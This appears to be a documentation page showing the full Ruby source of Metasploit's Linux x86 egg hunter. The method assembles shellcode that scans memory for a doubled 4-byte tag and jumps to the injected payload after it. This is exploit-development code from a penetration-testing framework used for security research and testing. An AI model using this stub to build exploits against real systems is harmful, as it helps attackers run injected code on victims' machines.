module Rex::Exploitation::Egghunter::Linux::X86


hunter_stub(payload, badchars = '', opts = {})

The egg hunter stub for linux/x86.

# File lib/rex/exploitation/egghunter.rb, line 259
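      # Assembles the egg hunter stub for linux/x86 and returns its raw bytes.
      #
      # The generated code scans memory one page at a time. Each page is first
      # probed with the 'sigaction' syscall (eax = 0x43) and skipped when the
      # low byte of the result is 0xf2, i.e. the kernel reported EFAULT, so the
      # hunter itself never touches an unmapped page. On a readable page the
      # four-byte tag is compared twice in a row (two +scasd+), the optional
      # checksum fragment from +checksum_stub+ runs, and control is transferred
      # to the address following the doubled tag via +jmp edi+.
      #
      # @param payload [String] the payload the hunter looks for; only used to
      #   build the optional checksum via +checksum_stub+
      # @param badchars [String] characters to avoid; forwarded to
      #   +checksum_stub+ only — this method does not filter the assembled
      #   hunter body against them
      # @param opts [Hash] options
      # @option opts [String] :eggtag the tag to search for; must be exactly
      #   4 bytes
      # @option opts [String] :startreg register that already holds the address
      #   to start scanning from; copied into ecx unless it is ecx
      # @return [String] the assembled x86 stub
      # @raise [RuntimeError] if :eggtag is missing or not exactly 4 bytes
      def hunter_stub(payload, badchars = '', opts = {})

        startreg = opts[:startreg]

        # The hunter matches a doubled 32-bit tag, so the egg must be one
        # machine word. The same size is used for the check and the message
        # so they cannot drift apart.
        esize = 4
        eggtag = opts[:eggtag]
        if eggtag.nil? || eggtag.length != esize
          raise RuntimeError, "Invalid egg string! Need #{esize} bytes."
        end

        # Little-endian immediate for the 'mov eax,<tag>' below.
        marker = "0x%x" % eggtag.unpack('V').first

        checksum = checksum_stub(payload, badchars, opts)

        # Optional prologue: seed ecx from the caller's register and skip the
        # first readability probe. Built with '+' rather than '<<' so a frozen
        # literal is never mutated.
        startstub = ''
        if startreg
          startstub += "\n\tmov ecx,#{startreg}" unless startreg.downcase == 'ecx'
          startstub += "\n\tjmp next_addr\n\t"
        end

        assembly = <<EOS
  cld
#{startstub}
check_readable:
  or cx,0xfff
next_addr:
  inc ecx
  push 0x43   ; use 'sigaction' syscall
  pop eax
  int 0x80
  cmp al,0xf2
  je check_readable

check_for_tag:
  ; check that the tag matches once
  mov eax,#{marker}
  mov edi,ecx
  scasd
  jne next_addr
  ; it must match a second time too
  scasd
  jne next_addr

  ; check the checksum if the feature is enabled
#{checksum}

  ; jump to the payload
  jmp edi
EOS

        # Assemble with Metasm's IA-32 backend and hand back the raw bytes.
        Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string
      end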